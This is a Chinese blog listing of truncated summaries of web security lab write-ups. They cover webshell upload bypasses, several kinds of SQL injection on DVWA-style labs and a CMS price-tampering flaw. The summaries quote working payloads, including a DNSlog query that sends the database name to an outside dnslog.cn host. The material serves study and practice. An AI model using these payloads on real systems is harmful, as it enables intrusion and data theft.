enyalau

摘要： 1.尝试上传一个webshell 文件，提示不允许上传.asp,.aspx,.php,.jsp后缀文件； 再尝试上传一个txt 文件，提示文件上传成功，判断为黑名单检测 2. 更改BP content-type 中数据类型，依然上传失败 修改httpd.conf内容，尝试使用.php3、.php5、 阅读全文

摘要： 绕过技巧：修改 MIME 类型为合法类型，一般修改为图片类型 1. 上传webshell文件，提示格式不正确； 2. 查看BP历史记录，发现有上传数据包的历史信息，判断为服务器端检查 3. 将数据包发送到Repeater，更改content-type 为image/png，并发送数据包，响应消息中提 阅读全文

摘要： 在上传点上传非法文件，提示上传文件不符合要求，且BP没有新的数据包产生，判断为客户端检查 禁用浏览器JavaScript后刷新网页，再次上传文件，提示上传成功，文件路径为uploads/test.php edge: 设置->Cookie和网站权限->所有权限->Javascript->禁用 Chor 阅读全文

摘要： DNSlog平台：http://www.dnslog.cn/ 获取数据库名： 1' and (load_file(concat('//',(select database()),'.q5lobx.dnslog.cn/abc')))%23 获取表名 1' and (load_file(concat(' 阅读全文

摘要： 1.判断注入 1.输入 1'，addslashes函数将 ' 进行转义变为 \' ，此时的单引号仅作为普通的字符 2.输入1%df'，addslashes 函数将 ' 进行转义变为 \' ，此时 %df%5c会进行结合变成了一个汉字 運，因此SQL查询语句成功被改变了从而引起了报错 1%df' => 阅读全文

摘要： 1.判断是否存在注入 1.1. 输入1时，页面正常返回，输入 1'时，页面出现报错。说明很有可能存在漏洞。 1.2. 利用1 and 1=1、1 and 1=2和1'and '1'='1 、1'and '1'='2 对注入类型进行判断。 2.获取数据库名 输入 1'and updatexml(1,c 阅读全文

摘要： 1. 判断是否存在注入 由于页面没有任何的回显，因此无法再用常规的方法进行判断，这里需要用到sleep()函数来进行判断。 sleep()函数使程序停止执行一段指定的时间。一般使用 1 and sleep(n) 1' and sleep(n)%23 进行判断，n为要停止的时间，以秒为单位。 1.当输 阅读全文

摘要： 1. 判断是否存在注入 当输入1' and '1'='1 时，页面返回User ID exists in the database. 当输入1'and'1'='2 时，页面返回User ID is MISSING from the database. 由此判断存在布尔盲注注入点 2. 获取数据库名 阅读全文

摘要： Low 1. 注入点判断 1 and 1=1 1 and 1=2 1' and '1'='1 1' and '1'='2，没有返回结果 由此可判断注入点为数据类型，单引号闭合 2. 判断表列数 3' order by 3 # 遍历order by 参数，判断查询过的列数为2列 3.确认显示位 4.获 阅读全文

摘要： 在大米CMS上购买一个商品，选择站内扣款并提交订单，BP抓包 2. 根据抓包内容找到带有敏感信息的数据包(URL 带有dobuy)，分析敏感信息 根据数据包中的信息我们可以获取下面可能有用的敏感信息 商品id，数量qty，价格price， 其他信息：是否购物车结算iscart，付款方式trade_t 阅读全文